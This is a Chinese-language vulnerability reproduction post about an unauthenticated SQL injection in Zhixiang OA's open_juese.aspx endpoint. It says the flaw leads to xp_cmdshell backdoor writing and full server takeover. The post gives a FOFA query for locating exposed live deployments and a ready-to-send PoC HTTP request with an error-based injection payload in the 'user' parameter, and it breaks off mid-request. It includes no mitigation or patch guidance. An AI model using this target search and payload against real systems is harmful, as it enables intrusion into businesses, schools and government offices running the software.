致翔OA open_juese.aspx SQL注入致RCE漏洞复现
0x01 产品简介
致翔OA是由广州致翔计算机科技有限公司(及其深圳分公司)开发的一款集成多个行业应用功能的OA协同办公平台。致翔OA支持为企事业单位、教育机构、政府机构等多个行业提供协同办公解决方案。每个行业版本都针对该行业的特定需求进行了优化,如企业版集成了CRM、销售、生产管理、HR和项目管理等功能;教育版则集成了教务、行政、后勤、总务、招生、财务、学生成长、教师成长、家校互动等功能。
0x02 漏洞概述
致翔OA open_juese.aspx 接口存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句,调用xp_cmdshell写入后门文件,执行任意代码,从而获取到服务器权限。
0x03 复现环境
FOFA:app="致翔软件-致翔OA"
0x04 漏洞复现
PoC
GET /OpenWindows/open_juese.aspx?key=1&name=1&user=-1)+and+1=@@VERSION--+&requeststr= HTTP/1.1
Host:
User-Agent: Mo